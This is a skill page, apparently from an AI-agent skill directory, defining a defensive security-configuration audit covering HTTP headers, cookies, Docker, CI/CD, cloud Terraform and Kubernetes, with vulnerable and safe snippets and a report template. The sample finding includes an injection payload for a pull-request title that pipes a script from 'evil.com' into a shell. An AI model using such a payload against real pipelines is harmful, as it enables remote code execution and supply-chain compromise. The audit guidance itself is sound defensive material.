Menú
Security configuration analysis (Headers, CORS, Docker, CI/CD, Cloud, K8s)
Instalar con Codex o Claude Copia este prompt, pégalo en Codex, Claude u otro asistente, y deja que revise la página de la skill y la instale por ti.
Basado en la clasificación ocupacional SOC
Use when you want to run a full, automated penetration test from start to finish (Scan -> Audit -> Exploit -> Report)
Use when starting a security conversation to understand the Perseus methodology
Use when analyzing components for vulnerabilities (Phase 2 - Parallel Analysis)
Use when verifying vulnerabilities with Dynamic Exploit Generation (Phase 3)
Use when generating the final executive security report (Phase 4)
Run all specialist deep-dive skills in parallel for comprehensive analysis
| name | perseus-config |
| description | Security configuration analysis (Headers, CORS, Docker, CI/CD, Cloud, K8s) |
IMPORTANT: This skill performs security configuration analysis on the user's own codebase. This is defensive security testing to ensure proper security hardening.
Authorization: The user owns this codebase and has explicitly requested this specialized analysis.
| Category | Technologies |
|---|---|
| Web Frameworks | Express, Fastify, Next.js, Go/Gin, PHP/Laravel, Python/FastAPI, Rust/Actix |
| Containers | Docker, Podman, containerd |
| Orchestration | Kubernetes, Docker Compose, Docker Swarm |
| CI/CD | GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure DevOps |
| Cloud | AWS, GCP, Azure, DigitalOcean, Vercel, Netlify |
| IaC | Terraform, Pulumi, CloudFormation, Ansible |
This specialist skill analyzes security configuration including HTTP headers, TLS settings, CORS policies, container security, CI/CD pipelines, and cloud configurations.
When to Use: As part of any security assessment, or specifically when reviewing deployment configuration.
Goal: Ensure all security configurations follow best practices and don't introduce vulnerabilities.
| Mode | Specialist Behavior |
|---|---|
PRODUCTION_SAFE | Configuration and manifest analysis with passive verification |
STAGING_ACTIVE | Controlled config validation with limited active checks |
LAB_FULL | Broad environment hardening validation in lab |
LAB_RED_TEAM | Defensive stress simulation for infra misconfig chains in isolated lab |
deliverables/engagement_profile.md before active infra validation.PRODUCTION_SAFE if engagement mode is missing.| Risk | Description | Impact |
|---|---|---|
| Missing Security Headers | No CSP, HSTS, X-Frame-Options | XSS, clickjacking |
| CORS Misconfiguration | Overly permissive origins | Data theft |
| Insecure Cookies | Missing Secure, HttpOnly, SameSite | Session hijacking |
| Debug Mode | Production debug enabled | Info disclosure |
| Docker Misconfig | Root user, privileged mode | Container escape |
| CI/CD Secrets | Exposed secrets, injection | Supply chain attack |
| Cloud Misconfig | Public buckets, open security groups | Data breach |
| K8s Insecurity | No RBAC, privileged pods | Cluster compromise |
deliverables/engagement_profile.md.deliverables/verification_scope.md when present.CSP Analyst:
Framework-Specific:
// Express/Helmet
app.use(helmet.contentSecurityPolicy({ directives: {...} }));
// Next.js - next.config.js
headers: [{ key: 'Content-Security-Policy', value: '...' }]
// Go/Gin
c.Header("Content-Security-Policy", "default-src 'self'")
# Django
CSP_DEFAULT_SRC = ("'self'",)
# FastAPI
response.headers["Content-Security-Policy"] = "..."
// Laravel
header('Content-Security-Policy: default-src \'self\'');
Security Headers Analyst:
Headers to Check:
| Header | Purpose | Recommended Value |
|---|---|---|
| Strict-Transport-Security | Force HTTPS | max-age=31536000; includeSubDomains |
| X-Frame-Options | Prevent clickjacking | DENY or SAMEORIGIN |
| X-Content-Type-Options | Prevent MIME sniffing | nosniff |
| Referrer-Policy | Control referrer | strict-origin-when-cross-origin |
| Permissions-Policy | Limit browser features | Disable unused features |
Cookie Security Analyst:
Patterns:
// Express - Check flags
res.cookie('session', value, { secure: true, httpOnly: true, sameSite: 'strict' });
// Go
http.SetCookie(w, &http.Cookie{Secure: true, HttpOnly: true, SameSite: http.SameSiteStrictMode})
// PHP
setcookie('session', $value, ['secure' => true, 'httponly' => true, 'samesite' => 'Strict']);
# FastAPI/Starlette
response.set_cookie(key, value, secure=True, httponly=True, samesite='strict')
Dockerfile Analyst:
Issues to Find:
# VULNERABLE - Running as root
FROM node:18
COPY . .
CMD ["node", "app.js"]
# SAFE - Non-root user
FROM node:18
RUN addgroup -S app && adduser -S app -G app
USER app
COPY --chown=app:app . .
CMD ["node", "app.js"]
Checks:
latest tagDocker Compose Analyst:
Issues:
# VULNERABLE
services:
app:
privileged: true # Container escape
network_mode: host # No network isolation
volumes:
- /:/host # Host filesystem access
cap_add:
- ALL # All capabilities
# SAFE
services:
app:
read_only: true
security_opt:
- no-new-privileges:true
cap_drop:
- ALL
Container Secrets Analyst:
Patterns:
# VULNERABLE
ENV DATABASE_PASSWORD=secret123
ARG API_KEY=sk-xxx
COPY .env /app/.env
Image Security Analyst:
Checks:
GitHub Actions Analyst:
Critical Issues:
# VULNERABLE - Command injection
- run: echo "${{ github.event.issue.title }}"
# SAFE - Use environment variable
- run: echo "$TITLE"
env:
TITLE: ${{ github.event.issue.title }}
# VULNERABLE - Pull request target with checkout
on: pull_request_target
steps:
- uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }} # Dangerous!
# VULNERABLE - Secrets in logs
- run: curl -H "Authorization: ${{ secrets.API_KEY }}" $URL
Checks:
GitLab CI Analyst:
Issues:
# VULNERABLE
script:
- echo $CI_JOB_TOKEN # Token exposure
- curl "$USER_INPUT" # Injection
# Check for:
# - Unprotected variables
# - Scripts with user input
# - Exposed tokens
Secrets Management Analyst:
Checks:
Pipeline Permissions Analyst:
GitHub Actions Permissions:
# VULNERABLE - Too permissive
permissions: write-all
# SAFE - Minimal permissions
permissions:
contents: read
pull-requests: write
AWS Configuration Analyst:
Check Files:
*.tf (Terraform)template.yaml (CloudFormation)serverless.yml.aws/ configsIssues:
# VULNERABLE - Public S3
resource "aws_s3_bucket" "data" {
acl = "public-read"
}
# VULNERABLE - Open security group
resource "aws_security_group" "web" {
ingress {
from_port = 0
to_port = 65535
cidr_blocks = ["0.0.0.0/0"]
}
}
# VULNERABLE - Hardcoded credentials
provider "aws" {
access_key = "AKIA..."
secret_key = "..."
}
GCP/Azure Configuration Analyst:
GCP Issues:
# VULNERABLE - Public GCS
resource "google_storage_bucket_iam_member" "public" {
member = "allUsers"
role = "roles/storage.objectViewer"
}
Serverless Configuration Analyst:
Check:
Infrastructure as Code Analyst:
Terraform Issues:
# VULNERABLE - No encryption
resource "aws_ebs_volume" "data" {
encrypted = false
}
# VULNERABLE - Default VPC
resource "aws_instance" "web" {
# No VPC specified, uses default
}
Pod Security Analyst:
Issues:
# VULNERABLE
spec:
containers:
- name: app
securityContext:
privileged: true # Container escape
runAsRoot: true # Root user
allowPrivilegeEscalation: true
volumeMounts:
- mountPath: /host
name: host-root # Host filesystem
# SAFE
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
containers:
- name: app
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop: ["ALL"]
RBAC Analyst:
Issues:
# VULNERABLE - Cluster admin to all
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
subjects:
- kind: ServiceAccount
name: default
roleRef:
kind: ClusterRole
name: cluster-admin
Network Policy Analyst:
Issues:
Secrets & ConfigMap Analyst:
Issues:
# VULNERABLE - Plain text secret
apiVersion: v1
kind: Secret
data:
password: cGFzc3dvcmQ= # Base64, not encryption!
# Check for:
# - Secrets in ConfigMaps
# - Unencrypted secrets
# - Secrets mounted as environment variables
# - Missing RBAC on secrets
Debug Mode Analyst:
Patterns:
// Node.js
DEBUG = true
NODE_ENV = 'development'
# Django
DEBUG = True
# Flask
app.run(debug=True)
// Laravel
APP_DEBUG=true
// Go
gin.SetMode(gin.DebugMode)
Error Handling Analyst:
Environment Variables Analyst:
Issues:
Create deliverables/config_security_analysis.md:
# Security Configuration Analysis
## Summary
| Category | Checks | Pass | Fail | Critical |
|----------|--------|------|------|----------|
| HTTP Headers | X | Y | Z | W |
| Cookies | X | Y | Z | W |
| Docker | X | Y | Z | W |
| CI/CD | X | Y | Z | W |
| Cloud (AWS/GCP/Azure) | X | Y | Z | W |
| Kubernetes | X | Y | Z | W |
| App Config | X | Y | Z | W |
## Technologies Detected
- Framework: [e.g., Next.js, Go/Gin]
- Container: Docker, Kubernetes
- CI/CD: GitHub Actions
- Cloud: AWS
## Critical Findings
### [CONFIG-001] GitHub Actions Command Injection
**Severity:** Critical
**Location:** `.github/workflows/pr.yml:23`
**Vulnerable Code:**
```yaml
- run: |
echo "PR Title: ${{ github.event.pull_request.title }}"
Attack: Attacker creates PR with title: "; curl evil.com/shell.sh | sh #
Remediation:
- run: echo "PR Title: $TITLE"
env:
TITLE: ${{ github.event.pull_request.title }}
Severity: Critical
Location: docker-compose.yml:15
Vulnerable Code:
services:
app:
privileged: true
Impact: Container escape, host compromise
Severity: Critical
Location: terraform/storage.tf:8
| Check | Status | File |
|---|---|---|
| Non-root user | FAIL | Dockerfile |
| No secrets in image | PASS | - |
| Pinned base image | FAIL | Dockerfile |
| Read-only filesystem | FAIL | docker-compose.yml |
| Dropped capabilities | FAIL | docker-compose.yml |
| Check | Status | File |
|---|---|---|
| No command injection | FAIL | pr.yml |
| Minimal permissions | FAIL | build.yml |
| No secrets in logs | PASS | - |
| Verified actions only | WARN | deploy.yml |
| Check | Status | File |
|---|---|---|
| Non-root pods | FAIL | deployment.yaml |
| Network policies | MISSING | - |
| RBAC configured | WARN | rbac.yaml |
| Secrets encrypted | FAIL | secrets.yaml |
| Check | Status | Resource |
|---|---|---|
| No public buckets | FAIL | S3: data-bucket |
| Encrypted storage | PASS | EBS volumes |
| Restricted security groups | FAIL | sg-web |
| No hardcoded credentials | PASS | - |
# Recommended Kubernetes securityContext
securityContext:
runAsNonRoot: true
runAsUser: 1000
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop: ["ALL"]
# Recommended GitHub Actions permissions
permissions:
contents: read
pull-requests: write
**Next Step:** Configuration issues are typically binary (secure or not) and don't require exploit verification.